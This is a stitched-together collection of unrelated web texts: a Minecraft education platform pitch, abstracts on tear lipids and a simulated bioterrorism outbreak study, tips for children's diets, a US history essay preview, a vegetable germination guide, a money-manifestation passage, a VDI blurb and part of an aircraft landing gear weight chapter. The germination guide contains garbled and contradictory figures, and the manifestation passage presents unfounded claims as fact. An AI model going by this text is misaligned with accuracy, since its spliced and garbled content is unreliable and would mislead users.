MCdemy is an online platform that brings into the world of Minecraft the exercises and tasks that students usually perform with pencil and paper, interspersing purely playful challenges to make the experience even more fun and definitively break the motivational barrier. In addition, MCdemy requires no prior planning or preparation of the classroom environment, offloading this task from teachers, and it is accessible from any computer with an official Minecraft license and an internet connection.
GBL: Game Based Learning
Gamification and videogame-based learning are rising trends poised to revolutionize the future of education. We only have to look at the important role video games occupy in children's leisure today to realize the motivating potential they would have if we managed to integrate them into academic environments as tools for achieving meaningful learning. We hold the mistaken belief that children love video games because they are easy and hate homework because it is difficult, when what usually happens is just the opposite. Most video games are very difficult and demand mastery of information and very complex techniques, posing a great intellectual challenge for the player, who finds in the game a stimulus to acquire knowledge and develop new skills.
Why Minecraft?
Today there are many digital educational products on almost every existing technology platform. However, many of these applications are too oriented towards achieving curricular objectives or facilitating the teacher's work, and some even forget the most important factor: the inherent fun of the game. When we set out to develop a learning environment based on video games, we went directly to the source and asked children: what is your favorite video game? The response was practically unanimous: Minecraft.
For children, Minecraft offers a virtual world in which they have absolute freedom of movement, and where everything is composed of blocks of different materials that can be combined to make new tools or construction elements, in a kind of infinite "virtual Lego".
For us, a team made up of developers, teachers, and pedagogues, Minecraft offers a virtual learning environment where we can model innumerable types of educational activities across different subjects. This is how MCdemy emerged.
Abstract
Purpose. To quantify the molecular lipid composition of patient-matched tear and meibum samples and compare tear and meibum lipid molecular profiles.
Methods. Lipids were extracted from tears and meibum by bi-phasic methods using 10:3 tert-butyl methyl ether:methanol, washed with aqueous ammonium acetate, and analyzed by chip-based nanoelectrospray ionization tandem mass spectrometry. Targeted precursor ion and neutral loss scans identified individual molecular lipids and quantification was obtained by comparison to internal standards in each lipid class.
Results. Two hundred and thirty-six lipid species were identified and quantified from nine lipid classes comprised of cholesterol esters, wax esters, (O-acyl)-ω-hydroxy fatty acids, triacylglycerols, phosphatidylcholine, lysophosphatidylcholine, phosphatidylethanolamine, sphingomyelin, and phosphatidylserine. With the exception of phospholipids, lipid molecular profiles were strikingly similar between tears and meibum.
Conclusions. Comparisons between tears and meibum indicate that meibum is likely to supply the majority of lipids in the tear film lipid layer. However, the observed higher mole ratio of phospholipid in tears shows that analysis of meibum alone does not provide a complete understanding of the tear film lipid composition.
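The class-specific internal-standard quantification mentioned in the Methods can be sketched as follows. The function and the numbers are hypothetical illustrations of the general single-point internal-standard approach, not the study's actual data or software.

```python
# Sketch of single-point internal-standard quantification, as commonly
# used in shotgun lipidomics: each lipid's signal is compared to a spiked
# internal standard of known amount within the same lipid class.
# All intensities and amounts below are made-up example values.

def quantify(analyte_intensity, standard_intensity, standard_amount_pmol):
    """Estimate analyte amount from its intensity ratio to the standard."""
    return (analyte_intensity / standard_intensity) * standard_amount_pmol

# e.g. a wax ester peak at 2.4x the intensity of a 10 pmol standard:
print(quantify(2400, 1000, 10.0))  # -> 24.0 pmol
```

The mole ratios compared between tears and meibum in the Results would then come from summing such per-species amounts within each lipid class.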
Community Reaction to Bioterrorism: Prospective Study of Simulated Outbreak
Published Date: Jun 2003
Source: Emerg Infect Dis. 9(6):708-712.
Keywords: Adolescent; Adult; Aged; Behavior; Bioterrorism; Centers For Disease Control And Prevention (U.S.); Communication; Community Health Services; Cooperative Behavior; Disaster Planning; Disease Outbreaks; Female; Humans; Interinstitutional Relations; Male; Mass Behavior; Middle Aged; Prospective Studies; Psychological; Questionnaires; Research; Rift Valley Fever; Risk Communication; Terrorism; United States; Bioterrorism Research
Description: To assess community needs for public information during a bioterrorism-related crisis, we simulated an intentional Rift Valley fever outbreak in a community in the southern part of the United States. We videotaped a series of simulated print and television "news reports" over a fictional 9-day crisis period and invited various groups (e.g., first-responders and their spouses or partners, journalists) within the selected community to view the videotape and respond to questions about their reactions. All responses were given anonymously. First-responders and their spouses or partners varied in their reactions about how the crisis affected family harmony and job performance. Local journalists exhibited considerable personal fear and confusion. All groups demanded, and put more trust in, information from local sources. These findings may have implications for risk communication during bioterrorism-related outbreaks.
Sometimes, children need a little bit of extra encouragement to eat their fruits and vegetables, and if you’re cooking for some particularly fussy eaters, your job can be just a little bit more challenging. Here, you’ll find the top seven ways to encourage your children — and the rest of your family — to eat better.
Jane Rylands from kitchen appliance retailer Belling shares her top tips for encouraging your children to eat healthier
In a recent survey we carried out, 21% of people said that they were unsure how to amend recipes to cater to different tastes and diets. But one of the simplest ways you can encourage your children to eat healthier, and prepare healthy kid-friendly dinners, is to swap some of their favourite ingredients for more nutritious alternatives.
For example, consider using sweet potatoes instead of regular ones to make mash, chips and baked potatoes. Cauliflower also makes a great alternative to potatoes in curries and stews and can be a great substitute for rice. Use a spiraliser to make healthy vegetable versions of noodles and pasta using courgettes and carrots. You can gradually ease the kids into eating these healthier alternatives by mixing them in with your usual noodles.
For dessert, you can swap cream and ice cream for yoghurt — just mix it with berries for a vitamin-packed alternative to a classic ice cream sundae. You can even make your own ice lollies using fresh fruit juice and smoothies.
Children need to eat every 3-4 hours, so you’ll need snacks. For healthy snacks for kids, try swapping sweets and chocolate bars with small packs of raisins or a banana. Chopped up melon is also a great alternative that children will love.
Another simple way you can get healthier foods into your child's diet is by 'hiding' them in other meals. This can be as simple as finely grating vegetables and adding them to pasta sauces or soups, adding fruit purees to their morning porridge, or even mixing them into your usual cake mix; this method is particularly effective for making healthy meals for picky kids.
One of my best tips to encourage your children to eat better is by making the food more appealing to them. Try cutting fruit into fun shapes, or making pictures using vegetables.
To encourage fussy eaters to try new things, consider having them rate their vegetables during each meal. This way, you can keep track of what they do like so you can make more of it. You could even try dedicating your weekly meals to a different fruit or vegetable, working together to come up with creative recipes that incorporate that week’s ingredient. You can then vote on your favourite meals at the end of the month so you can make them again in the future.
When doing your weekly food shop, bring your kids along and ask them to select which fruits and vegetables they want that week. This will let you know which foods they do like, and they'll be more likely to eat them if they know that they've chosen them themselves. This is also a great way to slowly introduce new foods to them.
To get kids excited about eating healthy foods, you could try growing your own fruits and vegetables at home. This is both more environmentally friendly and can help to cut the cost of your weekly shop. Plus, your little ones will be more likely to eat the food they’ve worked hard to grow with you.
If you don’t have a garden or growing your own produce would be difficult, why not take the kids fruit picking? It’ll give you the opportunity to talk about where their food comes from, and they’ll enjoy eating them after they’ve had a fun day out gathering them all.
Try asking children to lend a helping hand when you’re preparing vegetables for dinner. If they’re too young to hold a knife, ask them to pass you certain vegetables as you’re chopping. Just like growing your own food, knowing you’ve both worked hard to prepare the meal together will encourage your children to eat better. Just holding the food in their hands for a while can increase their familiarity with different types of fruits and vegetables, and they may be less reluctant to try them.
Allowing children to assemble their own plates or “build it yourself” meals such as fajitas and sandwiches can also work really well! Simply set out a selection of healthy options and let your kids do the rest.
To encourage your children to make these kinds of decisions on their own, reward healthy behaviours with praise. This could be as simple as verbal praise, or you could make a healthy eating rewards chart. For particularly fussy eaters, reward them with a point every time they eat a full serving of vegetables. When they reach a certain number of points, celebrate with a fun family day out to keep the behaviour going.
By following these seven simple tips, you can easily encourage your whole family to make healthier food choices.
Essay Preview
For a nation that has been around for over 200 years, the history of America is full of memorable and significant events that have had an impact on today's society. Presidential elections have changed significantly over the years, but candidates affiliated with political parties have been around since the late 18th century. Because of the Louisiana Purchase, the United States was able to expand quickly in size. The American Revolution was the war that made the United States the sovereign nation it currently is. Important events like the election of 1796, the Louisiana Purchase, and the American Revolution have changed the United States unlike any other events before them.
The election of 1796 was the first presidential election in the United States in which a candidate affiliated with a political party was elected, and the third United States election overall. What makes this election so significant is that, hundreds of years later, elements that were used back then are still used today. During the first election in the United States, there were no political parties. Voters were split between Federalists, people who supported the ratification of the Constitution, and Anti-Federalists, people who did not. George Washington won the presidency with all of the electoral votes. His vice president was John Adams, a Federalist. At this time, voters could only vote for the president, and whoever won the second-most electoral votes became vice president. In the next election, George Washington and John Adams remained president and vice president, respectively. Washington's retirement from the presidency led to opp...
... middle of paper ...
... deciding factor for the colonists was an alliance with France. It is impossible to imagine all the different possibilities of what the United States would be like today if the American Revolution was lost or never fought at all. One thing that is certain is that the United States would not be the same.
The effects of events that took place over two hundred years ago in America can still be seen today. American elections continue to involve the fundamentals of the election of 1796. The belief in a nation that expanded "from sea to shining sea" became attainable because of acquisitions like the Louisiana Purchase. Because of the Revolutionary War, the United States became independent and has grown into a global force unlike ever before. The United States has flourished because of events such as the election of 1796, the Louisiana Purchase, and the American Revolution.
Seed germination of vegetables and sowing times
Seed germination is the process by which an organism grows from a seed. The seeds inside fruits or vegetables are designed to spread throughout the environment and grow into new plants in a process called seed germination. Vegetable seed germination is the means by which a plant species grows from a single seed into a new plant. A common example of seed germination is the sprouting of a seedling from a seed of an angiosperm or gymnosperm. Sowing is the procedure of planting.
Let us discuss the seed germination process and sowing times for different vegetables.

Bean
A bean seed begins to germinate when the soil reaches the right temperature and moisture penetrates the seed coat. Bean seeds germinate, or sprout, when water dissolves or cracks open the hard casing around the seed or embryo. Beans are sown from early October to mid-March depending on the climate. The seed is sown 20 to 40 mm deep, depending on the prevailing weather. Generally, beans are sown in rows around 500 mm apart, with 50 to 100 mm between plants. The ideal bean seed germination temperature is 70°F to 80°F; germination is slow and poor when soil temperatures are below 60°F and may then take two weeks or more. If bean seed is small (3,000 per kg) and sown at a spacing of 50 x 750 mm, 90 kg of seed is needed per hectare. For larger bean seed (1,500 per kg), 180 kg of seed is needed per hectare if germination is 100%.

Broccoli
Germinating broccoli seeds takes about 5 to 10 days depending on how warm the soil is. Warm soil will speed up the germination process, while cold soil will slow it down. Broccoli seeds germinate best at temperatures between 45°F and 85°F, and they can be sprouted in the house, in a greenhouse, or in outdoor garden soil. Sow seed ¼ to ½ inch (6 to 8 mm) deep in the seed-starting mix. The optimum time for seed sowing is mid-August to mid-September. Broccoli can be sown by the line sowing or broadcasting method.

Cabbage
Cabbage seed germinates best at a constant temperature of 65°F to 70°F. At this temperature range, cabbage seeds will sprout within three to four days. Cabbage seeds germinate at temperatures ranging from 45°F to 85°F; outside the optimum range, seeds can take anywhere from four to 14 days to germinate. Cooler temperatures slow the germination process, while warmer temperatures speed it up.
Sowing seed directly in the garden should wait until spring, when the soil temperature warms to at least 40°F and the soil is tillable. Cabbage seeds need a planting depth of ½ to ¾ inch and spacing of inches, with seedlings later thinned to 12 to 24 inches apart, in rows spaced at least 18 to 34 inches apart.

Spinach
Spinach seed germination takes 7 to 14 days, but seed can sometimes take up to 3 weeks to germinate in cold soil. Spinach seeds germinate best at temperatures between 40°F and 75°F. For proper germination, the soil should not be warmer than 70°F (21°C). Sow spinach seed one-half inch deep and two inches apart in beds or rows. Spinach produces beautifully in cool fall conditions, but it's tricky to persuade the seed to germinate in the hot conditions of late summer. Sow spinach seeds ½ to 1 inch deep, covering lightly with soil. Sow 12 seeds per foot of row, or sprinkle over a wide row or bed.
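The bean seeding-rate figures quoted earlier (90 kg/ha for small seed, 180 kg/ha for large) can be checked with a little arithmetic, sketched below. The function name is my own; the assumptions are that one hectare is 10,000 m², one seed occupies a 50 mm x 750 mm cell, and germination is 100%, as the text states.

```python
# Sketch: checking the bean seeding-rate arithmetic from the text.
# Assumptions: 1 hectare = 10,000 m2, one seed per spacing x row cell,
# 100% germination.

HECTARE_MM2 = 10_000 * 1_000_000   # 1 ha expressed in square millimetres

def seed_rate_kg_per_ha(spacing_mm, row_mm, seeds_per_kg):
    """Kilograms of seed needed to sow one hectare at the given spacing."""
    seeds_per_ha = HECTARE_MM2 / (spacing_mm * row_mm)
    return seeds_per_ha / seeds_per_kg

print(round(seed_rate_kg_per_ha(50, 750, 3000)))  # small seed  -> ~89 kg/ha (text: 90)
print(round(seed_rate_kg_per_ha(50, 750, 1500)))  # larger seed -> ~178 kg/ha (text: 180)
```

The results agree with the rounded figures in the text, and halving the seed count per kilogram doubles the weight required, exactly as stated.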
Kale
Kale seed germinates best in warm soil: 5 to 7 days at or near 70°F (21°C), but sometimes up to two weeks if the soil is cold. Cover seeds with about half an inch of soil and don't allow them to dry out before germinating. Sow kale seed in early spring, or in late summer for a fall or winter crop. Sow seed ¼ to ½ inch (6-13 mm) deep and 4 inches (10 cm) apart; later thin seedlings to 16 to 18 inches (40-45 cm) apart, and use the thinnings in salads. If sowing kale seed in summer for a fall harvest, place the seed in a folded damp paper towel inside a plastic bag and keep it in the refrigerator for five days before sowing.

Peas
Peas will sprout in 21 to 30 days if the soil temperature is 38°F, and the germination rate (the number of seeds that sprout) will be low. At temperatures of 65 to 70°F, pea seeds will sprout within 7 to 14 days. Sow seeds outdoors 4 to 6 weeks before the last spring frost date, when soil temperatures reach at least 45°F (7°C). In the plains of North India, early sowing is done in October, whereas optimum varieties are sown in November. In the hills, the first crop of peas is sown from the middle of March to the end of May, and a second crop is sown in autumn.

Tomatoes
Sowing tomato seeds should be done at the end of winter, towards mid-March, indoors at a temperature of around 65°F to 70°F (18°C to 20°C). Tomato seeds will commonly germinate within 5 to 10 days. It is best to keep the germination temperature in the range of 70 to 80°F (21 to 27°C); the lower the temperature, the slower the germination. Temperatures below 50°F (10°C) or above 95°F (35°C) are poor for germination. Sow seed from late February to mid-March using a heated propagator or a warm, south-facing windowsill.
The temperature of the compost should be approximately 22°C for the seeds to germinate; young plants will also need to be kept warm until early summer, when the soil temperature is above at least 10°C.
Onions
Onion seed germination is faster at temperatures of 68 to 77°F (20-25°C), with slight temperature drops at night. Warm soil temperatures can trigger onion seed germination in as little as 4 days. Sow seed ¼ to ½ inch (6-12 mm) deep; plant sets about one inch (2.5 cm) deep for large onions and 2 inches (5 cm) deep for green onions, and space rows 12 inches (30 cm) apart. Onion seeds should germinate in 4 to 10 days at an optimal temperature of around 70°F (21°C); germination will be slower in chilly soil.

Alfalfa
Alfalfa can germinate at temperatures greater than 37°F, but the optimum germination temperature is between 65 and 77°F. As the soil warms, the rate of germination increases because of increased water movement into the seed and increases in the rate of other metabolic activities associated with germination. Alfalfa seed germination and seedling emergence occur in about three to seven days. Sowing is done from spring to summer.

Cauliflower
Cauliflower seed germination usually takes eight to ten days. Sow cauliflower seeds half an inch deep and 2 to 3 inches apart. Thin plants to 15 to 24 inches apart; space rows 24 to 30 inches apart. The optimum soil temperature for germination is 80°F, though cauliflower will germinate at temperatures as low as 50°F.

Celery
Sow seed indoors 14 to 6 weeks before the last spring frost. Set out seedlings when they reach three inches (8 cm) tall, about the time of the last frost. Sow seed ⅛ inch (3 mm) deep; the seed will germinate in about ten days. Soak seed overnight in water before sowing. Celery seeds germinate best at 70 to 75°F during the day and 60°F at night. The best method to germinate celery seeds is to start the plants indoors in seed flats.
Celery seeds take 14 days to 21 days to germinate and emerge from the soil. Okra Okra The okra seeds generally germinate in 2 to 12 days. Okra seeds take 27 days to 30 days to germinate in the soil at 65°F. If the soil is 75°F, seed germination time is cut in half. Sow 3 to 4 seeds to a pot or across flats; then clip away the weaker seedlings once the strongest seedling is about two inches (5 cm) tall and sow seed ½ inch (13 mm) deep. Optimum soil temperature for germinating okra seed is 85°F (29°C). Moringa or drumstick Moringa or drumstick Soak moringa seeds in water for 24 hours for the quick germination process. The sowing season for drumstick as it is a warm-season plant, the drumstick tree is usually planted after the end of the cool season. The moringa plant will germinate within 12 days. The planting of drumstick is generally done during June after the first shower of rains. In the sowing method, the seeds should be planted in an area with light, dry soil, and placed in holes dug 30cm (1ft) deep and 30cm wide. In each plant 3 to 5 seeds at a distance of 5cm (2in) apart, and water the soil, such that the topsoil remains moist. Chicory Chicory Chicory seeds will germinate from 41-85°F (5-29°C), but the highest germination percentage will occur around 75°F (24°C), depending on the variety and seed lot. Sow seeds 6 seeds per foot, rows 12-18 inches apart. Cover seed lightly, about 1/8 inch, and firm soil gently. Dry soil should be watered to ensure coolness and moisture, and for uniform germination. Thin the seedlings 8 inches apart as soon as they are large enough to handle. Chicory can be direct seeded outdoors in the early spring season. Optimal soil temperatures for germination are 65 to 70°F and sow seeds ¼” deep in rows 20″ apart. Chicory seeds will germinate in 7 to 21 days. Watercress Watercress Sow watercress seeds outdoors in spring when the soil has warmed up; minimum temperature 8°C (46°F). 
Or watercress seeds can be sown directly into the containers where you want them to grow. To start off plants earlier in the year, sow seeds from mid-January to the end of March month in pots or trays of moist seed sowing compost. Watercress seeds will germinate in the soil about 7 to 14 days.
Brinjal or Eggplant
Eggplant (brinjal) seeds germinate in 7 to 14 days, depending on heat, moisture, and the moisture content and age of the seed. Eggplant seeds germinate at temperatures between 60-95°F (15-35°C), and seedlings emerge in seven to ten days. Sow eggplant seed ¼ to ½ inch deep, spaced 4 to 5 inches apart.
Cucumbers
Sow cucumbers from mid-spring into small pots of seed-starting or general-purpose potting mix. Sow two cucumber seeds about an inch (3 cm) deep, then water well. Cucumbers need temperatures of at least 68°F (20°C) to germinate, so either place pots in a propagator for speedier germination, or simply wait until late spring to get started. The cucumber germination temperature range is 60°F to 90°F; do not plant until the soil reaches 65°F. Germination may take ten days or longer at cooler temperatures.
Pumpkins
Pumpkin seed germination takes 4 to 10 days at 85°F (29°C) or warmer. Sow pumpkins indoors two to three weeks before the last expected spring frost, then transplant them into the garden after all danger of frost has passed. Sow pumpkins outdoors when the soil temperature has warmed to 70°F (21°C). Pumpkin seeds will not germinate at soil temperatures below 66°F (18°C).
Carrots
The optimal soil temperature range is 7-30°C (45-85°F). Carrot seeds can take 14 to 21 days to germinate. Because carrot seeds are tiny, they should be sown shallowly; the trick is to keep the top-most layer of soil damp during the long germination period. Direct sow April to mid-July for harvests from July to November. Direct sow winter-harvest carrots in the first two weeks of August. Sow at three-week intervals for a continuous harvest.
Chard
Chard seed germinates in 5 to 7 days at around 60°F to 65°F (16-18°C), but can take up to three weeks if the soil is cold. Germination will not occur in soil colder than 50°F (10°C). Sow chard seeds ½ to 1 inch deep and 2 to 6 inches apart, in rows 18 to 24 inches apart. Alternatively, sow seeds 1 inch (2.5 cm) apart and later thin seedlings to 6 inches (15 cm) apart; use the thinnings in salads.
Endive
Endive seed germinates in about 5 to 14 days at around 70°F (21°C), but can take up to 2 weeks if the soil is cold. Sow endive or escarole seed in the garden as early as four to six weeks before the average date of the last spring frost. Endive seed started indoors for transplanting out can be sown 8 to 10 weeks before the average last frost. Sow endive seeds ¼ inch (6 mm) deep, 1 to 2 inches (2.5-5 cm) apart; later thin seedlings to 6 to 9 inches (15-23 cm) apart.
Arugula or Rocket
Arugula seeds take five to seven days to germinate in soil at 40 to 55°F; at room temperature, around 70°F, the seeds germinate in a few days. Sow seed ¼ inch (6 mm) deep, 2 to 4 inches (5-10 cm) apart; later thin seedlings to six inches (15 cm) apart. Arugula seed germinates in 5 to 7 days at around 60°F (16°C), but will germinate in soil as chilly as 40°F (4°C). Keep the soil evenly moist until seeds germinate, then keep it moist until seedlings are well established.
Turnips
Turnip seeds can germinate at temperatures as low as 40°F. Sow seed ½ inch (12 mm) deep, about 2 inches apart, and be sure to firm the soil well; turnips often fail to germinate when there is insufficient contact with the soil. Later thin to 4 to 6 inches (10-15 cm) apart for large storage turnips, and 2 to 4 inches apart for greens. The seeds should germinate in 3 to 10 days at an optimal temperature of around 70°F (21°C); germination will take longer in colder soil.
Sorrel
Sorrel can be grown from seed sown in the garden as early as 2 to 3 weeks before the average last frost date, once the soil has warmed up in spring. Sow sorrel seed half an inch deep and 2 to 3 inches apart. Thin successful seedlings to 12 to 18 inches apart when plants are 6 to 8 weeks old. Space rows 18 to 24 inches apart.
Tinda
The soil temperature needs to be at least 25°C for tinda seeds to germinate; germination takes place within the first 6 to 8 days. Soak the seeds overnight, then sow 2 to 3 seeds at a depth of about an inch (2-3 cm) on one side of the channel and keep the soil damp. Thin the seedlings after 15 days to maintain two per pit at 0.9 m spacing. Seed sowing to harvest takes about 45 days.
Lentils
Sow lentils in spring as early as two to three weeks before the average last frost date. Lentils can be started indoors before transplanting to the garden; lentil seeds will germinate in ten days at 68°F. Lentils are sown directly in seed holes in spring and harvested in summer.
Guar or cluster beans
During the rainy season, seeds are sown 2 to 3 cm (1 in) deep on ridges, and in furrows during the summer months. Guar must be planted when the soil temperature is above 70°F; the optimum soil temperature for germination is 86°F. Complete guar sowing from mid-July to mid-August. Use a row-to-row distance of 30 cm and sow seeds at a depth of 2-3 cm, using a seed drill or the Pora or Kera method.
Basil
The optimal temperature for basil seed germination is 21°C (70°F). Sow basil seeds one centimeter deep; seeds should sprout in five to ten days and take between 8 and 14 days to emerge from the soil. Basil seeds germinate well as long as temperatures remain between 65°F and 85°F.
Lavender
Lavender seeds can take as long as a month to germinate, although sometimes they'll sprout in as little as 14 days. Help germination by placing seed trays in a warm spot; about 70°F is ideal. Sow lavender seeds from February to July on the surface of moist seed compost. Lavender seed germinates most evenly if the seeds are collected in autumn and sown on the surface of a seed tray with bottom heat maintaining 4 to 10°C (40-50°F). The seedlings will germinate in about 2 weeks and will take a while to look like lavender.
Cilantro or Coriander
Cilantro seeds germinate in about 7 to 10 days at soil temperatures of 55 to 68°F, though they can take up to two or three weeks before quickly producing leafy growth. Cilantro plants can withstand temperatures down to freezing. Sow coriander in spring as early as 2 to 3 weeks after the last expected frost date; coriander is sown from late March until early September.
That covers the germination process and sowing time for these different types of vegetable, herb, and legume seeds.
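The temperature and day ranges quoted above can be collected into a small lookup table for planning sowing dates. A minimal sketch in Python; the table name, helper name, and the selection of crops are my own, but the values are transcribed from the text above:

```python
# Optimal soil temperature (°C) and typical germination window (days),
# transcribed from the guide above for a few crops.
GERMINATION = {
    "onion":       (21, 4, 10),   # ~70°F optimum, 4-10 days
    "cauliflower": (27, 8, 10),   # 80°F optimum, 8-10 days
    "okra":        (29, 2, 12),   # 85°F optimum, 2-12 days
    "basil":       (21, 5, 10),   # 70°F optimum, sprouts in 5-10 days
}

def germination_window(crop):
    """Return a short sowing note for a crop in the table (hypothetical helper)."""
    temp_c, d_min, d_max = GERMINATION[crop]
    return f"{crop}: optimal soil temp ~{temp_c}°C, sprouts in {d_min}-{d_max} days"
```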
Well, yes and no. If we see money as the form of energetic exchange it is, then we perceive its value differently. In the material world, if we treat money as something independent, solely a tool for purchases, then we deceive ourselves about how money fits into an abundance mindset.
So many of us want to chalk our experiences up to others, but in reality our thoughts, words, and actions are what translate into our reality. Ever thought of a person right before they called? Or envisioned a promotion that happened in the couple of weeks following? That's you calling things in, because your emotions align with them. Just as we have days where we feel "everything bad is happening to us" and then get pulled over with a speeding ticket, we can also rework the algorithm by changing that pattern, connecting to our happiness, and experiencing better outcomes.
Over the past few years, however, the endpoint computing model has begun to change in several ways. One visible new endpoint computing model is called Virtual Desktop Infrastructure (VDI). Instead of running the Windows operating system and applications and storing files locally on a physical PC device, VDI serves up desktop images as a managed service typically running on servers in data centers.
Is Virtual Desktop Infrastructure (VDI) gaining momentum, or does it represent yet another empty threat to Wintel hegemony? VDI carries many benefits around business agility, but it can be costly to deploy.
This white paper highlights:
Why many organizations are moving forward with VDI; the positives and negatives of VDI security; why organizations need VDI-centric endpoint security; and how security impacts VDI costs and ROI.
8.1. Introduction
Statistical weight equations, although capable of producing landing gear group weights
quickly and generally accurately, do not respond to all the variations in landing gear design parameters. In addition, the equations are largely dependent on the database of existing aircraft. For future large aircraft, such weight data is virtually non-existent. Thus, it is desirable to adopt an analytical weight estimation method that is more sensitive than statistical methods to variations in the design of the landing gear. The objectives are to allow for parametric studies involving key design considerations that drive landing gear weight, and to establish crucial weight gradients to be used in the optimization process. Based on the procedures described in this chapter, algorithms were developed to size and estimate the weight of the structural members of the landing gear. The weight of non-structural members was estimated using statistical weight equations. The two were then combined to arrive at the final group weight.
thus are able to produce estimates which reflect the effect of varying design parameters to some extent. Actual and estimated landing gear weight fractions are presented in Fig. 8.1. Figure 8.1a provides comparisons for estimates which only use MTOW. Figure 8.1b provides comparisons with methods which take into account more details, specifically the gear length. As shown in Fig. 8.1a, for an MTOW up to around 200,000 lb, the estimated values from ACSYNT and Torenbeek are nearly equal. However, as the MTOW increases, completely different trends are observed for the two equations: an increasing and then a decreasing landing gear weight fraction is predicted by ACSYNT, whereas a continually increasing weight fraction is predicted by Torenbeek. As for the Douglas equation, an increasing weight fraction is observed throughout the entire MTOW range. Upon closer examination of the data presented, it was found that only a small number of actual landing gear weight cases are available to establish trends for aircraft takeoff weights above 500,000 pounds. In addition, even within the range where significant previous experience is available, the data scatter between actual and estimated values is too large to draw conclusions on the accuracy of existing weight equations. Evidently a systematic procedure is needed to validate the reliability of the statistical equations, and provide another level of estimation.
[Figure 8.1 Actual and estimated landing gear weight fractions (%MTOW) versus MTOW: a) estimates based on MTOW alone (ACSYNT, Torenbeek, Douglas); b) estimates including additional details (Raymer, FLOPS), with actual data for the B737, DC9, B727, B707, L1011, DC10, B747, and C5]
8.3.1 Generic Landing Gear Model A generic model consisting of axles, truck beam, piston, cylinder, drag and side struts, and trunnion is developed based on existing transport-type landing gears. Since most, if not all, of the above items can be found in both the nose and main gear, the model can easily be modified to accommodate both types of assembly without difficulty. Although the torsion links are presented for completeness, they are ignored in the analysis since their contributions to the final weight are minor. The model shown in Fig. 8.2 represents a dual-twin-tandem configuration. The model can be modified to represent a triple-dual-tandem or a dual-twin configuration with relative ease, i.e., by including a center axle on the truck beam, or replacing the bogie with a single axle, respectively. The model assumes that all structural components are of circular tube construction except in the case of the drag and side struts, where an I-section can be used depending on the configuration. When used as a model for the nose gear, an additional side strut arranged symmetrically about the plane of symmetry is included.
For added flexibility in terms of modeling different structural arrangements, the landing gear geometry is represented by three-dimensional position vectors relative to the aircraft reference frame. Throughout the analysis, the xz-plane is chosen as the plane of symmetry with the x-axis directed aft and the z-axis upward. The locations of structural components are established by means of known lengths and/or point locations, and each point-to-point component is then defined as a space vector in the x, y, and z directions. Based on this approach, a mathematical representation of the landing gear model is created and is shown in Fig. 8.3.

[Figure 8.3 Mathematical representation of the landing gear model]

Vector         | Description
BA             | Forward trunnion
BC             | Aft trunnion
BE             | Cylinder
AE             | Drag strut
DE             | Side strut
EF             | Piston
FG, FJ         | Truck beam
GH, GI, JK, JL | Axles
Table 8.1 Basic landing gear loading conditions [20]

Dynamic: three-point level landing, one-wheel landing, tail-down landing, lateral drift landing, braked roll
Static: turning, pivoting

The corresponding aircraft attitudes are shown in Fig. 8.4, where symbols D, S and V are the drag, side and vertical forces, respectively, n is the aircraft load factor, W is the aircraft maximum takeoff or landing weight, T is the forward component of inertia force, and I is the inertial moment in pitch and roll conditions necessary for equilibrium. The subscripts m and n denote the main and nose gear, respectively.
[Figure 8.4 Aircraft attitudes under dynamic and static loading conditions [20]: a) three-point level landing, b) one-wheel landing, c) tail-down landing, d) lateral drift landing, e) braked roll, f) turning, g) pivoting]
For the dynamic landing conditions listed in Table 8.1, the total vertical ground reaction (F) at the main assembly is obtained from the expression [43]

F = \frac{cW}{\eta S \cos\alpha}\left(\frac{V_s^2}{g} + S\cos\alpha\right)   (8.1)

where c is the aircraft weight distribution factor, η is the gear efficiency factor, S is the total stroke length, α is the angle of attack at touchdown, Vs is the sink speed, and g is the gravitational acceleration. Although the vertical force generated in the gear is a direct function of the internal mechanics of the oleo, in the absence of more detailed information Eq. (8.1) provides a sufficiently accurate approximation. The maximum vertical ground reaction at the nose gear, which occurs during low-speed constant deceleration, is calculated using the expression [5, p. 359]
F_n = \frac{l_m + (a_x/g)\,h_{cg}}{l_m + l_n}\,W   (8.2)

For a description of the variables and the corresponding values involved in Eq. (8.2), refer to Chapter Four, Section Two. The ground loads are initially applied to the axle-wheel centerline intersection except for the side force. As illustrated in Fig. 8.5, the side force is placed at the tire-ground contact point and replaced by a statically equivalent lateral force in the y direction and a couple whose magnitude is the side force times the tire rolling radius.
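Eq. (8.2) is straightforward to evaluate. A minimal sketch in Python; the function name and default units (ft, lb, ft/s²) are my own choices:

```python
def nose_gear_reaction(W, l_m, l_n, h_cg, a_x, g=32.174):
    """Eq. (8.2): maximum vertical nose-gear reaction during constant deceleration.

    W    : aircraft weight (lb)
    l_m  : cg-to-main-gear distance (same length unit as h_cg and l_n)
    l_n  : cg-to-nose-gear distance
    h_cg : cg height above the ground
    a_x  : deceleration (same units as g; default g is in ft/s^2)
    """
    return W * (l_m + (a_x / g) * h_cg) / (l_m + l_n)
```

With no braking (a_x = 0) this reduces to the static nose load W·l_m/(l_m + l_n), and any deceleration shifts additional load onto the nose gear, as expected.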
[Figure 8.5 Replacement of the side force S at the tire-ground contact point by a statically equivalent lateral force and couple at the axle]
To determine the forces and moments at the selected structural nodes listed in Table 8.2, the resisting force vector (F_res) is set equal and opposite to the applied force vector (F_app)

F_{res} = -F_{app}   (8.3)

whereas the resisting moment vector (M_res) is set equal and opposite to the sum of the applied moment vector (M_app) and the cross product of the space vector (r) with F_app

M_{res} = -\left(M_{app} + r \times F_{app}\right)   (8.4)
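Eqs. (8.3) and (8.4) amount to one vector negation and one cross product per node. A minimal sketch (the function name is my own; vectors are taken in the aircraft reference frame, with r running from the node to the point of application of the load):

```python
import numpy as np

def resisting_reactions(F_app, M_app, r):
    """Resisting force and moment at a structural node, Eqs. (8.3)-(8.4)."""
    F_app, M_app, r = map(np.asarray, (F_app, M_app, r))
    F_res = -F_app                          # Eq. (8.3)
    M_res = -(M_app + np.cross(r, F_app))   # Eq. (8.4)
    return F_res, M_res
```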
8.3.3.1. Coordinate Transformation

Given that the mathematical landing gear model and the external loads are represented in the aircraft reference frame, transformation of nodal force and moment vectors from the aircraft to body reference frames is required prior to the determination of member internal reactions and stresses. The body reference frames are defined such that the x3-axis is aligned with the component's axial centerline, and the xz-plane is a plane of symmetry if there is one. The transformation is accomplished by multiplying the force and moment vectors represented in the aircraft reference frame by the transformation matrix L_BA [45, p. 117]

F_B = L_{BA} F_A   (8.5)
M_B = L_{BA} M_A   (8.6)

where subscripts A and B denote the aircraft and landing gear body reference frames, respectively. By inspection of the angles in Fig. 8.7, where subscripts 1, 2, and 3 denote the rotation sequence from the aircraft (x, y, and z) to the body (x3, y3, and z3) reference frame, the three localized transformation matrices are [45, p. 117]

